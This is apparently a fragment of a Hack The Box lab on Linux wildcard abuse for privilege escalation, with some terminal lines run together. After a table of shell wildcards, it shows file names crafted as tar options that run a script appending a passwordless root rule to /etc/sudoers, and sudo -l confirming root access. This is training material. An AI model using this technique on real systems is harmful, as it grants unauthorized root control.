htb_student@NIX02:~$ echo $PATHhtb_student@NIX02:~$ pwd && conncheck Wildcard Abuse
| Character | Significance |
|---|---|
* | An asterisk that can match any number of characters in a file name. |
? | Matches a single character. |
[ ] | Brackets enclose characters and can match any single one at the defined position. |
~ | A tilde at the beginning expands to the name of the user home directory or can have another username appended to refer to that user’s home directory. |
- | A hyphen within brackets will denote a range of characters. |
htb_student@NIX02:~$ man tarhtb-student@NIX02:~$ echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
htb-student@NIX02:~$ echo "" > "--checkpoint-action=exec=sh root.sh"
htb-student@NIX02:~$ echo "" > --checkpoint=1htb-student@NIX02:~$ sudo -l
Matching Defaults entries for htb-student on NIX02:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User htb-student may run the following commands on NIX02:
(root) NOPASSWD: ALL